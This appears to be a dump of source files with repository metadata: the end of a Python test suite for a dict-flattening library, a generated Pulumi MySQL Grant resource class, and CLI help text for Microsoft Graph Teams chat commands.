'c_c_baz': 'n5',
'c_c_bar': 7,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x0',
'c_c_foo': 5,
'c_c_baz': 'n6',
'c_c_bar': 7,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x1',
'c_c_foo': 5,
'c_c_baz': 'n6',
'c_c_bar': 7,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x2',
'c_c_foo': 5,
'c_c_baz': 'n6',
'c_c_bar': 7,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x0',
'c_c_foo': None,
'c_c_baz': None,
'c_c_bar': None,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': 100},
{'a_a': 'x1',
'c_c_foo': None,
'c_c_baz': None,
'c_c_bar': None,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': 100},
{'a_a': 'x2',
'c_c_foo': None,
'c_c_baz': None,
'c_c_bar': None,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': 100}]
actual = flatten_preserve_lists(dic, max_list_index=50, max_depth=10)
self.assertEqual(expected, actual)
def test_flatten_preserve_lists_issue69(self):
"""https://github.com/amirziai/flatten/issues/69"""
dic = {
'a': 'a',
'b': [
{'b': 1, 'c': 1},
{'b': 2, 'c': 2},
{'b': 3, 'c': 3},
{'b': 4, 'c': 4},
{'b': 5, 'c': 5},
{'b': 6, 'c': 6},
{'b': 7, 'c': 7},
{'b': 8, 'c': 8},
{'b': 9, 'c': 9},
{'b': 10, 'c': 10},
{'b': 11, 'c': 11},
{'b': 12, 'c': 12},
{'b': 13, 'c': 13},
{'b': 14, 'c': 14},
{'b': 15, 'c': 15},
{'b': 16, 'c': 16},
{'b': 17, 'c': 17},
{'b': 15, 'c': 18},
{'b': 16, 'c': 19},
{'b': 17, 'c': 20}
]
}
expected = [
{'b.c': 1,
'b.b': 1,
'a': 'a'},
{'b.c': 2,
'b.b': 2,
'a': 'a'},
{'b.c': 11,
'b.b': 11,
'a': 'a'},
{'b.c': 12,
'b.b': 12,
'a': 'a'},
{'b.c': 13,
'b.b': 13,
'a': 'a'},
{'b.c': 14,
'b.b': 14,
'a': 'a'},
{'b.c': 15,
'b.b': 15,
'a': 'a'},
{'b.c': 16,
'b.b': 16,
'a': 'a'},
{'b.c': 17,
'b.b': 17,
'a': 'a'},
{'b.c': 18,
'b.b': 15,
'a': 'a'},
{'b.c': 19,
'b.b': 16,
'a': 'a'},
{'b.c': 20,
'b.b': 17,
'a': 'a'},
{'b.c': 3,
'b.b': 3,
'a': 'a'},
{'b.c': 4,
'b.b': 4,
'a': 'a'},
{'b.c': 5,
'b.b': 5,
'a': 'a'},
{'b.c': 6,
'b.b': 6,
'a': 'a'},
{'b.c': 7,
'b.b': 7,
'a': 'a'},
{'b.c': 8,
'b.b': 8,
'a': 'a'},
{'b.c': 9,
'b.b': 9,
'a': 'a'},
{'b.c': 10,
'b.b': 10,
'a': 'a'}]
actual = flatten_preserve_lists(dic,
separator='.',
max_list_index=100,
max_depth=5)
self.assertEqual(expected, actual)
def test_flatten_preserve_lists_issue72(self):
"""https://github.com/amirziai/flatten/issues/72"""
dic = {'a': 0,
'b': [
{'c': 1,
'd': [{'e': 1}]},
{'c': 2,
'd': [{'e': 2}]},
{'c': 3,
'd': [{'e': 3}]},
{'c': 4,
'd': [{'e': 4}]},
{'c': 5,
'd': [{'e': 5}]}]}
expected = [
{'b.c': 1,
'a': 0,
'b.d': 1},
{'b.c': 2,
'a': 0,
'b.d': 2},
{'b.c': 3,
'a': 0,
'b.d': 3},
{'b.c': 4,
'a': 0,
'b.d': 4},
{'b.c': 5,
'a': 0,
'b.d': 5}]
actual = flatten_preserve_lists(dic,
separator='.',
max_list_index=10,
max_depth=5)
self.assertEqual(expected, actual)
def test_unflatten_with_list_deep(self):
dic = {'a': [
{'b': [{'c': [{'a': 5, 'b': {'a': [1, 2, 3]}, 'c': {'x': 3}}]}]}]}
dic_flatten = flatten(dic)
actual = unflatten_list(dic_flatten)
self.assertEqual(actual, dic)
def test_flatten_ignore_keys(self):
"""Ignore a set of root keys for processing"""
dic = {
'a': {'a': [1, 2, 3]},
'b': {'b': 'foo', 'c': 'bar'},
'c': {'c': [{'foo': 5, 'bar': 6, 'baz': [1, 2, 3]}]}
}
expected = {
'a_a_0': 1,
'a_a_1': 2,
'a_a_2': 3
}
actual = flatten(dic, root_keys_to_ignore={'b', 'c'})
self.assertEqual(expected, actual)
def test_command_line(self):
input_stream = StringIO(u'{"a": {"b": 1}}')
output_stream = StringIO()
cli(input_stream, output_stream)
output = output_stream.getvalue()
result = json.loads(output)
self.assertEqual(result, dict(a_b=1))
def test_replace_separators_none(self):
dic = {
'a_with_separator': {'b': [1, 2, 3]},
}
expected = {
'a_with_separator_b_0': 1,
'a_with_separator_b_1': 2,
'a_with_separator_b_2': 3
}
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_replace_separators_remove(self):
dic = {
'a_with_separator': {'b': [1, 2, 3]},
}
expected = {
'awithseparator_b_0': 1,
'awithseparator_b_1': 2,
'awithseparator_b_2': 3
}
actual = flatten(dic, replace_separators='')
self.assertEqual(expected, actual)
def test_replace_separators_something(self):
dic = {
'a_with_separator': {'b': [1, 2, 3]},
}
expected = {
'a.with.separator_b_0': 1,
'a.with.separator_b_1': 2,
'a.with.separator_b_2': 3
}
actual = flatten(dic, replace_separators='.')
self.assertEqual(expected, actual)
def test_replace_separators_nested(self):
dic = {
'a_with_separator': {'b_with_separator': [1, 2, 3]},
}
expected = {
'awithseparator_bwithseparator_0': 1,
'awithseparator_bwithseparator_1': 2,
'awithseparator_bwithseparator_2': 3
}
actual = flatten(dic, replace_separators='')
self.assertEqual(expected, actual)
if __name__ == '__main__':
unittest.main()
| 28.672529
| 78
| 0.31554
| 8,375
| 68,470
| 2.20191
| 0.024478
| 0.070604
| 0.11713
| 0.043924
| 0.8993
| 0.890136
| 0.873922
| 0.855051
| 0.851852
| 0.832927
| 0
| 0.087404
| 0.503052
| 68,470
| 2,387
| 79
| 28.684541
| 0.454564
| 0.008412
| 0
| 0.873167
| 0
| 0
| 0.210467
| 0.001371
| 0
| 0
| 0
| 0
| 0.016393
| 1
| 0.013805
| false
| 0
| 0.002588
| 0
| 0.016825
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
293f18ccf733b02b839b4a0fc4975b7cada5eaea
| 26,947
|
py
|
Python
|
sdk/python/pulumi_mysql/grant.py
|
joesonw/pulumi-mysql
|
db3aa8cbfc8989a3708bcdf51ffd37427308c342
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2019-05-28T22:23:48.000Z
|
2020-11-17T09:32:42.000Z
|
sdk/python/pulumi_mysql/grant.py
|
joesonw/pulumi-mysql
|
db3aa8cbfc8989a3708bcdf51ffd37427308c342
|
[
"ECL-2.0",
"Apache-2.0"
] | 33
|
2019-05-13T16:15:19.000Z
|
2022-03-31T15:34:50.000Z
|
sdk/python/pulumi_mysql/grant.py
|
joesonw/pulumi-mysql
|
db3aa8cbfc8989a3708bcdf51ffd37427308c342
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2019-10-05T10:33:18.000Z
|
2021-06-21T03:35:40.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['GrantArgs', 'Grant']
@pulumi.input_type
class GrantArgs:
def __init__(__self__, *,
database: pulumi.Input[str],
grant: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
privileges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None,
roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
table: Optional[pulumi.Input[str]] = None,
tls_option: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Grant resource.
:param pulumi.Input[str] database: The database to grant privileges on.
:param pulumi.Input[bool] grant: Whether to also give the user privileges to grant the same privileges to other users.
:param pulumi.Input[str] host: The source host of the user. Defaults to "localhost". Conflicts with `role`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] privileges: A list of privileges to grant to the user. Refer to a list of privileges (such as [here](https://dev.mysql.com/doc/refman/5.5/en/grant.html)) for applicable privileges. Conflicts with `roles`.
:param pulumi.Input[str] role: The role to grant `privileges` to. Conflicts with `user` and `host`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] roles: A list of rols to grant to the user. Conflicts with `privileges`.
:param pulumi.Input[str] table: Which table to grant `privileges` on. Defaults to `*`, which is all tables.
:param pulumi.Input[str] tls_option: An TLS-Option for the `GRANT` statement. The value is suffixed to `REQUIRE`. A value of 'SSL' will generate a `GRANT ... REQUIRE SSL` statement. See the [MYSQL `GRANT` documentation](https://dev.mysql.com/doc/refman/5.7/en/grant.html) for more. Ignored if MySQL version is under 5.7.0.
:param pulumi.Input[str] user: The name of the user. Conflicts with `role`.
"""
pulumi.set(__self__, "database", database)
if grant is not None:
pulumi.set(__self__, "grant", grant)
if host is not None:
pulumi.set(__self__, "host", host)
if privileges is not None:
pulumi.set(__self__, "privileges", privileges)
if role is not None:
pulumi.set(__self__, "role", role)
if roles is not None:
pulumi.set(__self__, "roles", roles)
if table is not None:
pulumi.set(__self__, "table", table)
if tls_option is not None:
pulumi.set(__self__, "tls_option", tls_option)
if user is not None:
pulumi.set(__self__, "user", user)
@property
@pulumi.getter
def database(self) -> pulumi.Input[str]:
"""
The database to grant privileges on.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: pulumi.Input[str]):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def grant(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to also give the user privileges to grant the same privileges to other users.
"""
return pulumi.get(self, "grant")
@grant.setter
def grant(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "grant", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
The source host of the user. Defaults to "localhost". Conflicts with `role`.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def privileges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of privileges to grant to the user. Refer to a list of privileges (such as [here](https://dev.mysql.com/doc/refman/5.5/en/grant.html)) for applicable privileges. Conflicts with `roles`.
"""
return pulumi.get(self, "privileges")
@privileges.setter
def privileges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "privileges", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
The role to grant `privileges` to. Conflicts with `user` and `host`.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
@property
@pulumi.getter
def roles(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of rols to grant to the user. Conflicts with `privileges`.
"""
return pulumi.get(self, "roles")
@roles.setter
def roles(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "roles", value)
@property
@pulumi.getter
def table(self) -> Optional[pulumi.Input[str]]:
"""
Which table to grant `privileges` on. Defaults to `*`, which is all tables.
"""
return pulumi.get(self, "table")
@table.setter
def table(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "table", value)
@property
@pulumi.getter(name="tlsOption")
def tls_option(self) -> Optional[pulumi.Input[str]]:
"""
An TLS-Option for the `GRANT` statement. The value is suffixed to `REQUIRE`. A value of 'SSL' will generate a `GRANT ... REQUIRE SSL` statement. See the [MYSQL `GRANT` documentation](https://dev.mysql.com/doc/refman/5.7/en/grant.html) for more. Ignored if MySQL version is under 5.7.0.
"""
return pulumi.get(self, "tls_option")
@tls_option.setter
def tls_option(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tls_option", value)
@property
@pulumi.getter
def user(self) -> Optional[pulumi.Input[str]]:
"""
The name of the user. Conflicts with `role`.
"""
return pulumi.get(self, "user")
@user.setter
def user(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user", value)
@pulumi.input_type
class _GrantState:
def __init__(__self__, *,
database: Optional[pulumi.Input[str]] = None,
grant: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
privileges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None,
roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
table: Optional[pulumi.Input[str]] = None,
tls_option: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Grant resources.
:param pulumi.Input[str] database: The database to grant privileges on.
:param pulumi.Input[bool] grant: Whether to also give the user privileges to grant the same privileges to other users.
:param pulumi.Input[str] host: The source host of the user. Defaults to "localhost". Conflicts with `role`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] privileges: A list of privileges to grant to the user. Refer to a list of privileges (such as [here](https://dev.mysql.com/doc/refman/5.5/en/grant.html)) for applicable privileges. Conflicts with `roles`.
:param pulumi.Input[str] role: The role to grant `privileges` to. Conflicts with `user` and `host`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] roles: A list of rols to grant to the user. Conflicts with `privileges`.
:param pulumi.Input[str] table: Which table to grant `privileges` on. Defaults to `*`, which is all tables.
:param pulumi.Input[str] tls_option: An TLS-Option for the `GRANT` statement. The value is suffixed to `REQUIRE`. A value of 'SSL' will generate a `GRANT ... REQUIRE SSL` statement. See the [MYSQL `GRANT` documentation](https://dev.mysql.com/doc/refman/5.7/en/grant.html) for more. Ignored if MySQL version is under 5.7.0.
:param pulumi.Input[str] user: The name of the user. Conflicts with `role`.
"""
if database is not None:
pulumi.set(__self__, "database", database)
if grant is not None:
pulumi.set(__self__, "grant", grant)
if host is not None:
pulumi.set(__self__, "host", host)
if privileges is not None:
pulumi.set(__self__, "privileges", privileges)
if role is not None:
pulumi.set(__self__, "role", role)
if roles is not None:
pulumi.set(__self__, "roles", roles)
if table is not None:
pulumi.set(__self__, "table", table)
if tls_option is not None:
pulumi.set(__self__, "tls_option", tls_option)
if user is not None:
pulumi.set(__self__, "user", user)
@property
@pulumi.getter
def database(self) -> Optional[pulumi.Input[str]]:
"""
The database to grant privileges on.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def grant(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to also give the user privileges to grant the same privileges to other users.
"""
return pulumi.get(self, "grant")
@grant.setter
def grant(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "grant", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
The source host of the user. Defaults to "localhost". Conflicts with `role`.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def privileges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of privileges to grant to the user. Refer to a list of privileges (such as [here](https://dev.mysql.com/doc/refman/5.5/en/grant.html)) for applicable privileges. Conflicts with `roles`.
"""
return pulumi.get(self, "privileges")
@privileges.setter
def privileges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "privileges", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
The role to grant `privileges` to. Conflicts with `user` and `host`.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
@property
@pulumi.getter
def roles(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of rols to grant to the user. Conflicts with `privileges`.
"""
return pulumi.get(self, "roles")
@roles.setter
def roles(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "roles", value)
@property
@pulumi.getter
def table(self) -> Optional[pulumi.Input[str]]:
"""
Which table to grant `privileges` on. Defaults to `*`, which is all tables.
"""
return pulumi.get(self, "table")
@table.setter
def table(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "table", value)
@property
@pulumi.getter(name="tlsOption")
def tls_option(self) -> Optional[pulumi.Input[str]]:
"""
An TLS-Option for the `GRANT` statement. The value is suffixed to `REQUIRE`. A value of 'SSL' will generate a `GRANT ... REQUIRE SSL` statement. See the [MYSQL `GRANT` documentation](https://dev.mysql.com/doc/refman/5.7/en/grant.html) for more. Ignored if MySQL version is under 5.7.0.
"""
return pulumi.get(self, "tls_option")
@tls_option.setter
def tls_option(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tls_option", value)
@property
@pulumi.getter
def user(self) -> Optional[pulumi.Input[str]]:
"""
The name of the user. Conflicts with `role`.
"""
return pulumi.get(self, "user")
@user.setter
def user(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user", value)
class Grant(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
database: Optional[pulumi.Input[str]] = None,
grant: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
privileges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None,
roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
table: Optional[pulumi.Input[str]] = None,
tls_option: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
The ``Grant`` resource creates and manages privileges given to
a user on a MySQL server.
## Examples
### Granting Privileges to a User
```python
import pulumi
import pulumi_mysql as mysql
jdoe_user = mysql.User("jdoeUser",
host="example.com",
plaintext_password="password",
user="jdoe")
jdoe_grant = mysql.Grant("jdoeGrant",
database="app",
host=jdoe_user.host,
privileges=[
"SELECT",
"UPDATE",
],
user=jdoe_user.user)
```
### Granting Privileges to a Role
```python
import pulumi
import pulumi_mysql as mysql
developer_role = mysql.Role("developerRole")
developer_grant = mysql.Grant("developerGrant",
database="app",
privileges=[
"SELECT",
"UPDATE",
],
role=developer_role.name)
```
### Adding a Role to a User
```python
import pulumi
import pulumi_mysql as mysql
jdoe = mysql.User("jdoe",
host="example.com",
plaintext_password="password",
user="jdoe")
developer_role = mysql.Role("developerRole")
developer_grant = mysql.Grant("developerGrant",
database="app",
host=jdoe.host,
roles=[developer_role.name],
user=jdoe.user)
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] database: The database to grant privileges on.
:param pulumi.Input[bool] grant: Whether to also give the user privileges to grant the same privileges to other users.
:param pulumi.Input[str] host: The source host of the user. Defaults to "localhost". Conflicts with `role`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] privileges: A list of privileges to grant to the user. Refer to a list of privileges (such as [here](https://dev.mysql.com/doc/refman/5.5/en/grant.html)) for applicable privileges. Conflicts with `roles`.
:param pulumi.Input[str] role: The role to grant `privileges` to. Conflicts with `user` and `host`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] roles: A list of rols to grant to the user. Conflicts with `privileges`.
:param pulumi.Input[str] table: Which table to grant `privileges` on. Defaults to `*`, which is all tables.
:param pulumi.Input[str] tls_option: An TLS-Option for the `GRANT` statement. The value is suffixed to `REQUIRE`. A value of 'SSL' will generate a `GRANT ... REQUIRE SSL` statement. See the [MYSQL `GRANT` documentation](https://dev.mysql.com/doc/refman/5.7/en/grant.html) for more. Ignored if MySQL version is under 5.7.0.
:param pulumi.Input[str] user: The name of the user. Conflicts with `role`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: GrantArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
The ``Grant`` resource creates and manages privileges given to
a user on a MySQL server.
## Examples
### Granting Privileges to a User
```python
import pulumi
import pulumi_mysql as mysql
jdoe_user = mysql.User("jdoeUser",
host="example.com",
plaintext_password="password",
user="jdoe")
jdoe_grant = mysql.Grant("jdoeGrant",
database="app",
host=jdoe_user.host,
privileges=[
"SELECT",
"UPDATE",
],
user=jdoe_user.user)
```
### Granting Privileges to a Role
```python
import pulumi
import pulumi_mysql as mysql
developer_role = mysql.Role("developerRole")
developer_grant = mysql.Grant("developerGrant",
database="app",
privileges=[
"SELECT",
"UPDATE",
],
role=developer_role.name)
```
### Adding a Role to a User
```python
import pulumi
import pulumi_mysql as mysql
jdoe = mysql.User("jdoe",
host="example.com",
plaintext_password="password",
user="jdoe")
developer_role = mysql.Role("developerRole")
developer_grant = mysql.Grant("developerGrant",
database="app",
host=jdoe.host,
roles=[developer_role.name],
user=jdoe.user)
```
:param str resource_name: The name of the resource.
:param GrantArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(GrantArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
database: Optional[pulumi.Input[str]] = None,
grant: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
privileges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None,
roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
table: Optional[pulumi.Input[str]] = None,
tls_option: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = GrantArgs.__new__(GrantArgs)
if database is None and not opts.urn:
raise TypeError("Missing required property 'database'")
__props__.__dict__["database"] = database
__props__.__dict__["grant"] = grant
__props__.__dict__["host"] = host
__props__.__dict__["privileges"] = privileges
__props__.__dict__["role"] = role
__props__.__dict__["roles"] = roles
__props__.__dict__["table"] = table
__props__.__dict__["tls_option"] = tls_option
__props__.__dict__["user"] = user
super(Grant, __self__).__init__(
'mysql:index/grant:Grant',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
database: Optional[pulumi.Input[str]] = None,
grant: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
privileges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None,
roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
table: Optional[pulumi.Input[str]] = None,
tls_option: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None) -> 'Grant':
"""
Get an existing Grant resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] database: The database to grant privileges on.
:param pulumi.Input[bool] grant: Whether to also give the user privileges to grant the same privileges to other users.
:param pulumi.Input[str] host: The source host of the user. Defaults to "localhost". Conflicts with `role`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] privileges: A list of privileges to grant to the user. Refer to a list of privileges (such as [here](https://dev.mysql.com/doc/refman/5.5/en/grant.html)) for applicable privileges. Conflicts with `roles`.
:param pulumi.Input[str] role: The role to grant `privileges` to. Conflicts with `user` and `host`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] roles: A list of rols to grant to the user. Conflicts with `privileges`.
:param pulumi.Input[str] table: Which table to grant `privileges` on. Defaults to `*`, which is all tables.
:param pulumi.Input[str] tls_option: An TLS-Option for the `GRANT` statement. The value is suffixed to `REQUIRE`. A value of 'SSL' will generate a `GRANT ... REQUIRE SSL` statement. See the [MYSQL `GRANT` documentation](https://dev.mysql.com/doc/refman/5.7/en/grant.html) for more. Ignored if MySQL version is under 5.7.0.
:param pulumi.Input[str] user: The name of the user. Conflicts with `role`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _GrantState.__new__(_GrantState)
__props__.__dict__["database"] = database
__props__.__dict__["grant"] = grant
__props__.__dict__["host"] = host
__props__.__dict__["privileges"] = privileges
__props__.__dict__["role"] = role
__props__.__dict__["roles"] = roles
__props__.__dict__["table"] = table
__props__.__dict__["tls_option"] = tls_option
__props__.__dict__["user"] = user
return Grant(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def database(self) -> pulumi.Output[str]:
"""
The database to grant privileges on.
"""
return pulumi.get(self, "database")
@property
@pulumi.getter
def grant(self) -> pulumi.Output[Optional[bool]]:
"""
Whether to also give the user privileges to grant the same privileges to other users.
"""
return pulumi.get(self, "grant")
@property
@pulumi.getter
def host(self) -> pulumi.Output[Optional[str]]:
"""
The source host of the user. Defaults to "localhost". Conflicts with `role`.
"""
return pulumi.get(self, "host")
@property
@pulumi.getter
def privileges(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of privileges to grant to the user. Refer to a list of privileges (such as [here](https://dev.mysql.com/doc/refman/5.5/en/grant.html)) for applicable privileges. Conflicts with `roles`.
"""
return pulumi.get(self, "privileges")
@property
@pulumi.getter
def role(self) -> pulumi.Output[Optional[str]]:
"""
The role to grant `privileges` to. Conflicts with `user` and `host`.
"""
return pulumi.get(self, "role")
@property
@pulumi.getter
def roles(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of rols to grant to the user. Conflicts with `privileges`.
"""
return pulumi.get(self, "roles")
@property
@pulumi.getter
def table(self) -> pulumi.Output[Optional[str]]:
"""
Which table to grant `privileges` on. Defaults to `*`, which is all tables.
"""
return pulumi.get(self, "table")
@property
@pulumi.getter(name="tlsOption")
def tls_option(self) -> pulumi.Output[Optional[str]]:
"""
An TLS-Option for the `GRANT` statement. The value is suffixed to `REQUIRE`. A value of 'SSL' will generate a `GRANT ... REQUIRE SSL` statement. See the [MYSQL `GRANT` documentation](https://dev.mysql.com/doc/refman/5.7/en/grant.html) for more. Ignored if MySQL version is under 5.7.0.
"""
return pulumi.get(self, "tls_option")
@property
@pulumi.getter
def user(self) -> pulumi.Output[Optional[str]]:
"""
The name of the user. Conflicts with `role`.
"""
return pulumi.get(self, "user")
| 42.170579
| 330
| 0.613649
| 3,306
| 26,947
| 4.874168
| 0.058984
| 0.100348
| 0.092094
| 0.069629
| 0.902755
| 0.891647
| 0.87303
| 0.865583
| 0.862418
| 0.854909
| 0
| 0.002532
| 0.26708
| 26,947
| 638
| 331
| 42.236677
| 0.813367
| 0.414814
| 0
| 0.821317
| 1
| 0
| 0.054394
| 0.001653
| 0
| 0
| 0
| 0
| 0
| 1
| 0.163009
| false
| 0.003135
| 0.015674
| 0
| 0.275862
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
296f6aa99683c870b479e02273fbee1813436565
| 282,223
|
py
|
Python
|
msgraph-cli-extensions/v1_0/teams_v1_0/azext_teams_v1_0/generated/_help.py
|
thewahome/msgraph-cli
|
33127d9efa23a0e5f5303c93242fbdbb73348671
|
[
"MIT"
] | null | null | null |
msgraph-cli-extensions/v1_0/teams_v1_0/azext_teams_v1_0/generated/_help.py
|
thewahome/msgraph-cli
|
33127d9efa23a0e5f5303c93242fbdbb73348671
|
[
"MIT"
] | null | null | null |
msgraph-cli-extensions/v1_0/teams_v1_0/azext_teams_v1_0/generated/_help.py
|
thewahome/msgraph-cli
|
33127d9efa23a0e5f5303c93242fbdbb73348671
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
from knack.help_files import helps
helps['teams_v1_0'] = '''
type: group
short-summary: Manage Teams
'''
helps['teams chat-chat'] = """
type: group
short-summary: Manage chat chat with teams_v1_0
"""
helps['teams chat-chat create-chat'] = """
type: command
short-summary: "Add new entity to chats."
"""
helps['teams chat-chat delete-chat'] = """
type: command
short-summary: "Delete entity from chats."
"""
helps['teams chat-chat list-chat'] = """
type: command
short-summary: "Get entities from chats."
"""
helps['teams chat-chat show-chat'] = """
type: command
short-summary: "Get entity from chats by key."
"""
helps['teams chat-chat update-chat'] = """
type: command
short-summary: "Update entity in chats."
"""
